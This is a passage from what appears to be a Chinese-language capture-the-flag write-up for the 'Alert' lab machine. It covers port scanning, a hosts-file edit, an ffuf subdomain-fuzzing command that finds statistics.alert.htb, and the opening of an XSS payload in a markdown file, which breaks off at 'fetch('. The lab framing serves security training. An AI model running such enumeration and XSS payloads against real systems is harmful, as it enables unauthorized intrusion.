一、靶场介绍
主机 | IP地址 |
---|---|
攻击机kali2024 | 10.10.16.27 |
靶机 | 10.10.11.44 |
二、信息收集
1.启动靶机,得到靶机IP10.10.11.44
2.对目标靶机进行端口扫描,发现22和80端口
3.浏览器访问80端口http服务
发现域名重定向,修改/ect/hosts
文件,加入10.10.11.44 alert.htb
,再次访问
根据题目名称Alert
猜测,应该与XSS漏洞有关
4.使用ffuf
进行子域名扫描ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://alert.htb -H "Host:FUZZ.alert.htb" -ac
发现了一个子域名statistics.alert.htb
,但状态码是401
,意味着需要提供认证信息才能访问
三、漏洞利用
1.在 markdown 文件中插入有效载荷
<script>
fetch(